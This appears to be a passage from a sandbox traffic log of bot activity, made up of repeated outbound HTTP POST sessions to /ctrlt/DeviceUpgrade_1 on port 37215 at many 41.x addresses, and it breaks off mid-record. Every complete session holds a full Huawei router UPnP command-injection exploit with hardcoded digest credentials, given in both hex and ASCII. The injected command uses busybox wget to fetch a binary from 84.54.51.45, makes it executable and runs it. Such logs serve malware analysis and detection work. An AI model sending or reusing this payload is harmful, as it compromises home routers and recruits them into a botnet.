2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1968192.168.2.154717241.141.132.24737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601243019 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1969192.168.2.156065641.150.26.14237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601258993 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1970192.168.2.154318641.96.238.18537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601294994 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1971192.168.2.153496441.121.86.19937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601306915 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1972192.168.2.154095641.165.241.21137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601344109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1973192.168.2.156035441.230.25.20837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601363897 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1974192.168.2.153609641.240.39.24737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601365089 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1975192.168.2.154733241.31.228.137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601402998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1976192.168.2.155737041.86.160.7237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601409912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1977192.168.2.154763641.81.53.4637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601418972 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1978192.168.2.153966241.155.116.21437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.601443052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
